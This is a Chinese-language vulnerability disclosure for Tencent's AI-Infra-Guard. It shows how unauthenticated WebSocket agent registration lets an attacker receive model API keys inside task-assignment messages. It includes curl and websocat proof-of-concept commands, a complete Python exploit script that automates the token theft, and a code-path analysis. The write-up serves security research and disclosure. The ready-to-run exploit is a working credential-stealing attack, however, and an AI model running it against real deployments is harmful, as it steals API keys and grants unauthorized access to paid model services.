当前分析版本: 截止 2025.10.24 的最新提交

项目地址:https://github.com/Tencent/AI-Infra-Guard

PS: 审计报告提交后,腾讯已于 2025.10.27 日,在 readme 中添加鉴权提醒。

https://github.com/Tencent/AI-Infra-Guard/commit/a9b98bcb13dfed2d9f174209b6cfdf41bae56092

免责声明:

  1. 本文基于公开的开源项目代码进行安全分析,仅用于安全研究、教学与防御目的,不构成对任何系统的攻击建议或利用指南。

  2. 文中涉及的 PoC、EXP 及相关技术细节,仅允许在 合法授权 的前提下用于测试与学习。禁止将本文内容用于未授权的渗透测试、入侵行为或其他任何违法用途,否则由此产生的一切法律责任与风险均由使用者本人承担,与作者无关。

  3. 本文所提及的漏洞信息与分析结论,仅针对文中注明的代码版本/提交哈希,后续版本可能已修复或发生变更,请以项目官方代码为准。

  4. 本文观点仅代表作者个人,与腾讯及 AI-Infra-Guard 项目官方无关。如相关方认为本文内容不适合公开,或存在表述不当之处,可联系作者进行修改或下线处理。

项目介绍

漏洞演示

可直接跳转 EXP 部分,有快速验证脚本

项目部署&环境准备

readme: https://github.com/Tencent/AI-Infra-Guard/blob/main/README_ZH.md

根据官方文档默认部署项目,不做任何其他修改,部署成功后访问效果如下。

点击模型管理->新增模型->添加好模型数据,模拟用户正常使用

添加成功后可以点击编辑等查看模型信息,注意到现在我们是没办法再获取到模型的 API Key 的,这里做了不返回 Token 的安全处理。

此 issue 中也说明,无法查看apikey

https://github.com/Tencent/AI-Infra-Guard/issues/102

POC

以下 PoC/EXP 仅在本人本地部署的 AI-Infra-Guard 环境中测试,请勿对任何未授权的线上目标使用。文中涉及的IP均为本人自购测试VPS,到期已释放。

项目目前默认无鉴权,如上 issues/102 ,需要用户自己添加 nginx 鉴权

使用此接口获取到模型列表,其中包含模型 id

# 获取 model_id
curl -s http://<host>:<port>/api/v1/app/models
​

攻击者开启第一个终端:

# 与部署项目的目标 agent 接口连接
websocat -n ws://<host>:<port>/api/v1/agents/ws
​
# ws 连接成功后发送下面样例数据
{"type":"register","content":{"agent_id":"poc-agent-1","hostname":"x","ip":"127.0.0.1","version":"1.0"}}
​

现在启用第二个终端: (如果一次没成功,则先修改 session 后多开几个 Agent 任务,详细原理将在代码分析中解释)

# 一样的替换为自己的 host port
# session 符合格式要求即可,内容随意
SESSION="sess12345"; curl -N "http://<host>:<port>/api/v1/app/tasks/sse/$SESSION" -H 'Accept: text/event-stream'
​

然后启用第三个终端:

SESSION="sess12345"
TS=$(($(date +%s%N)/1000000))
# 前面获取到的 model_id
MODEL_ID="model_1761188632115_8oyc79b97"
​
curl -s -X POST 'http://<host>:<port>/api/v1/app/tasks' \
  -H 'Content-Type: application/json' \
  -H 'username: attacker' \
  -d @- <<JSON_PAYLOAD
{
  "id": "m1",
  "sessionId": "${SESSION}",
  "taskType": "Model-Jailbreak",
  "timestamp": ${TS},
  "content": "test",
  "params": {
    "model_id": ["${MODEL_ID}"]
  }
}
JSON_PAYLOAD

现在回到第一个终端观察 ws 响应输出 (这里的演示从 前面 poc-agent-1 改成了 poc-agent-5,不影响,这是复现过程中预期情况)

可见成功泄露出 token 即 apikey

EXP

以下 PoC/EXP 仅在本人本地部署的 AI-Infra-Guard 环境中测试,请勿对任何未授权的线上目标使用。文中涉及的IP均为本人自购测试VPS,到期已释放。

替换 main 函数的 SERVER_HTTPWS_ENDPOINT 即可

只获取第一个 token 做为验证 (只取第一个 model_id )

import json
import queue
import random
import string
import threading
import time
import uuid
from urllib.parse import urlparse
​
import requests
import websocket
from websocket import WebSocketTimeoutException
​
​
def http_base(server: str) -> str:
    s = server.rstrip("/")
    return s
​
​
def ws_url(server: str) -> str:
    u = urlparse(server)
    scheme = "wss" if u.scheme == "https" else "ws"
    netloc = u.netloc
    path = "/api/v1/agents/ws"
    return f"{scheme}://{netloc}{path}"
​
​
def gen_session_id(n=10) -> str:
    alphabet = string.ascii_letters + string.digits + "_-"
    return "".join(random.choice(alphabet) for _ in range(n))
​
​
def sse_connect(server_http: str, session_id: str, ready_evt: threading.Event, stop_evt: threading.Event):
    url = f"{server_http}/api/v1/app/tasks/sse/{session_id}"
    headers = {"Accept": "text/event-stream"}
    try:
        with requests.get(url, stream=True, headers=headers, timeout=15) as r:
            if r.status_code != 200:
                print(f"[SSE] HTTP {r.status_code} opening SSE (AddTask may still see it).")
            for line in r.iter_lines(decode_unicode=True):
                if stop_evt.is_set():
                    break
                if not line:
                    continue
                if line.startswith("data: "):
                    payload = line[len("data: "):]
                    try:
                        obj = json.loads(payload)
                        # The server sends a 'connected' event when added
                        if obj.get("type") == "connected" or (isinstance(obj.get("event"), dict) and obj["event"].get("type") == "connected"):
                            print("[SSE] Connected event observed.")
                            ready_evt.set()
                    except Exception:
                        pass
    except Exception as e:
        # Even if SSE read fails, AddTask may already consider it connected
        print(f"[SSE] Exception: {e}")
​
​
def agent_worker(ws_endpoint: str, agent_id: str, out_q: queue.Queue, stop_evt: threading.Event):
    try:
        # Use short recv timeout in a loop so we can poll stop_evt and continue waiting
        ws = websocket.create_connection(ws_endpoint, timeout=10)
        ws.settimeout(5)
    except Exception as e:
        print(f"[AGENT {agent_id}] WS connect error: {e}")
        return
    try:
        reg = {
            "type": "register",
            "content": {"agent_id": agent_id, "hostname": "x", "ip": "127.0.0.1", "version": "1.0"},
        }
        ws.send(json.dumps(reg))
        # wait for messages
        while not stop_evt.is_set():
            try:
                msg = ws.recv()
            except WebSocketTimeoutException:
                # benign idle timeout, continue waiting
                continue
            except Exception as e:
                print(f"[AGENT {agent_id}] recv error: {e}")
                break
            if not msg:
                continue
            try:
                data = json.loads(msg)
            except Exception:
                continue
            if data.get("type") == "register_ack":
                print(f"[AGENT {agent_id}] registered.")
                continue
            if data.get("type") == "task_assign":
                content = data.get("content", {})
                params = content.get("params", {})
                model_field = params.get("model")
                token = model_name = base_url = None
                if isinstance(model_field, list) and model_field:
                    m0 = model_field[0]
                    token = m0.get("token")
                    model_name = m0.get("model")
                    base_url = m0.get("base_url")
                elif isinstance(model_field, dict):
                    token = model_field.get("token")
                    model_name = model_field.get("model")
                    base_url = model_field.get("base_url")
                out_q.put({
                    "token": token,
                    "model": model_name,
                    "base_url": base_url,
                    "raw": data
                })
                break
    finally:
        try:
            ws.close()
        except Exception:
            pass
​
​
def create_task(server_http: str, session_id: str, model_id: str, username: str = "attacker"):
    url = f"{server_http}/api/v1/app/tasks"
    ts = int(time.time() * 1000)
    payload = {
        "id": f"m-{uuid.uuid4().hex[:8]}",
        "sessionId": session_id,
        "taskType": "Model-Jailbreak",
        "timestamp": ts,
        "content": "test",
        "params": {
            # important: use array to match agent-side unmarshal into []ModelParams
            "model_id": [model_id]
        }
    }
    headers = {"Content-Type": "application/json", "username": username}
    r = requests.post(url, headers=headers, json=payload, timeout=15)
    try:
        j = r.json()
    except Exception:
        j = {"raw": r.text}
    print("[TASK CREATE]", j)
    return j
​
​
def list_models_get_first_model_id_noauth(server_http: str) -> str:
    """Fetch model_id from unauthenticated list endpoint.
​
    Uses: GET /api/v1/app/models (no headers) and pick the first model_id.
    """
    url = f"{server_http}/api/v1/app/models"
    r = requests.get(url, timeout=10)
    j = r.json()
    if j.get("status") == 0:
        data = j.get("data")
        if isinstance(data, list) and data:
            mid = data[0].get("model_id")
            if mid:
                return mid
    raise RuntimeError(f"Failed to find model_id from {url}. Response={j}")
​
​
def main():
    # Hardcoded configuration
    SERVER_HTTP = http_base("http://<host>:<port>")
    WS_ENDPOINT = ws_url("http://<host>:<port>")
    AGENTS = 8
    TIMEOUT = 90  # total seconds to wait for task_assign
    USERNAME = "attacker"
    ATTEMPTS = 8
    PER_ATTEMPT_WAIT = 10  # seconds to wait after creating a task
​
    session_id = gen_session_id()
    print(f"[INFO] Using sessionId={session_id}")
​
    # Auto-discover model_id via unauthenticated list endpoint
    print("[INFO] Fetching model_id from /api/v1/app/models")
    model_id = list_models_get_first_model_id_noauth(SERVER_HTTP)
    print(f"[INFO] Found model_id={model_id}")
​
    # Start agents (keep persistent across attempts)
    stop_evt = threading.Event()
    out_q = queue.Queue()
    agent_threads = []
    for i in range(AGENTS):
        agent_id = f"poc-agent-{i+1}-{uuid.uuid4().hex[:6]}"
        t = threading.Thread(target=agent_worker, args=(WS_ENDPOINT, agent_id, out_q, stop_evt), daemon=True)
        t.start()
        agent_threads.append(t)
​
    token_info = None
    deadline = time.time() + TIMEOUT
    attempt = 0
    while time.time() < deadline and token_info is None and attempt < ATTEMPTS:
        attempt += 1
        session_id = gen_session_id()
        print(f"[INFO] Attempt {attempt}/{ATTEMPTS}: using sessionId={session_id}")
        # Start SSE for this attempt
        sse_ready = threading.Event()
        sse_th = threading.Thread(target=sse_connect, args=(SERVER_HTTP, session_id, sse_ready, stop_evt), daemon=True)
        sse_th.start()
        sse_ready.wait(timeout=5)
        # Create task
        create_task(SERVER_HTTP, session_id, model_id, username=USERNAME)
        # Wait a bit for deliver
        try:
            token_info = out_q.get(timeout=min(PER_ATTEMPT_WAIT, max(1, int(deadline - time.time()))))
        except queue.Empty:
            print(f"[INFO] No task_assign received on attempt {attempt}. Retrying...")
            continue
​
    # Cleanup
    stop_evt.set()
​
    if token_info:
        print("[RESULT] token_exfiltration_success")
        print(json.dumps({
            "model": token_info.get("model"),
            "base_url": token_info.get("base_url"),
            "token": token_info.get("token"),
        }, ensure_ascii=False, indent=2))
        # Optional: print raw task_assign for debugging
        # print(json.dumps(token_info.get("raw"), ensure_ascii=False, indent=2))
    else:
        print("[RESULT] token_exfiltration_failed")
​
​
if __name__ == "__main__":
    main()
​

示例输出:

代码分析

总执行流程

  1. 任何人都可经由 WS 注册为 Agent(默认无认证、允许任意 Origin)。

  2. 创建一个引用 model_id(预期窃取模型)的任务。

  3. 服务器解析 model_id → 查询 DB 中的模型,并将解析到的 Token 嵌入到 params.model

  4. 服务器向第一个可用的 Agent 发送 task_assign

  5. 攻击者的 Agent 读取 content.params.model[*].token 获取到 token

Sink

总利用点为: TokenAPI Keytask_assign 任务分配过程中被作为携带信息发送给 攻击者的 agent

common/websocket/task_manager.go:198–223

通过 model_iddb 中取出 ModelParams 放入 modelInfo ,其中包含 token

将获取到的信息 嵌入 enhancedParams 后,直接发往 agent

其中 taskMsg 即封装消息,包含 token 及任务分配信息

source

Agent 选择逻辑

在任务分配下发给 agent 时,不是一次性发给全部 agent 的,所以我们需要分析下发时 agent 选择逻辑

正如 POC 复现

  • 获取可用连接列表:common/websocket/agent.go:495-508

    • GetAvailableAgents() 遍历 am.connections,把 isActive == true 的连接收集成切片返回。

  • 选择首个:common/websocket/task_manager.go:181-184

    • selectedAgent := availableAgents[0]

    • 含义:从"可用 Agent 列表"的第一个元素下发。由于底层 am.connectionsGomap[string]*AgentConnection,遍历顺序不保证稳定。因此"第一个"实质上是"当前这次遍历顺序中遇到的第一个活跃连接",效果上是未加权、未鉴权、未隔离的“首个可用”。 这个遍历顺序不稳定即前面 POC 所说,最好开多个 agent 去抢占任务以此增大成功率。

选择完 Agent 即继续回到 之前的 sink 逻辑

路由链

我们是从 Agent 进入的 sink ,则需要定位到 Agent 的请求链路和逻辑。

我们的 agent 必须先存在于服务器的在线连接集合中才能被分配。选择逻辑如前面分析;如果我们没有连接,则我们的 agent 就不可能被选中。因此我们先要保持 WS 链接并注册 Agent

注册Agent

common/websocket/server.go:209

得到 WS 链接路由 /api/v1/agents/ws

然后跟进此处理

common/websocket/agent.go:150–161

HTTP 升级为 WebSocket , 创建 AgentConnection 并启动 goroutine

其中跟进 upgrader -> common/websocket/websocket.go:15 可知允许任何 Origin 链接

返回到处理,继续从上面 handleConnection 处理单个连接的消息来到: common/websocket/agent.go:184–235

其中 要求 的注册消息格式如下,即 POC 格式

{"type":"register","content":{"agent_id":"poc-agent-5","hostname":"x","ip":"127.0.0.1","version":"1.0"}}

然后将通过反序列化进行 Agent 注册 , agent_id 如果存在则会断开连接复用旧链接,所以 EXP 中采用随机 agent_id

common/websocket/agent.go:215–221, 238–291

综上即:

# WS 连接
websocat -n ws://<host>:<port>/api/v1/agents/ws
# 连接后传入 json 进行 agent 注册
{"type":"register","content":{"agent_id":"poc-agent-5","hostname":"x","ip":"127.0.0.1","version":"1.0"}}

建立 SSE

要想触发 sinktask_assign 中下发包含 tokenparams.model),必须先走 AddTask;而 AddTask 会在分发前强制要求对应 sessionIdSSE 已建立。

common/websocket/task_manager.go:102–110

所以我们需要来到 POC 的第二步,确认建立 SSE 连接。

common/websocket/server.go:152 调度到 HandleTaskSSE

跟进可到 common/websocket/task_manager.go:975 以及 common/websocket/sse_manager.go:37

建立 SSE 连接,并将sessionId 写入连接表,关注到存在相同 sessionId 的处理,所以需要在创建多个 agent 进行利用时,改变 sessionId

创建任务

现在只需要创建任务即可完成整条链路的触发。

common/websocket/server.go:156 调度到 HandleTaskCreate

跟进处理,我们需要构造符合 sessionId 的格式要求即可。

验证通过后即进入前文所述 addTask 然后进行逻辑串联触发。

username补充

需要注意的是,我们走的这条链路 : dispatch username 无关他不会影响模型解析,所以 username 随意

此链路使用 GetModel 获取模型信息,并未添加绑定校验,只需要 model_id 即可

总结

数据流为:

保持WS连接注册 Agent -> 创建 SSE 连接 构建一个或者多个 Agent -> 创建任务 -> 触发模型解析嵌入Token -> WS通道选择 Agent 并将 Token 信息返回

国家一级保护废物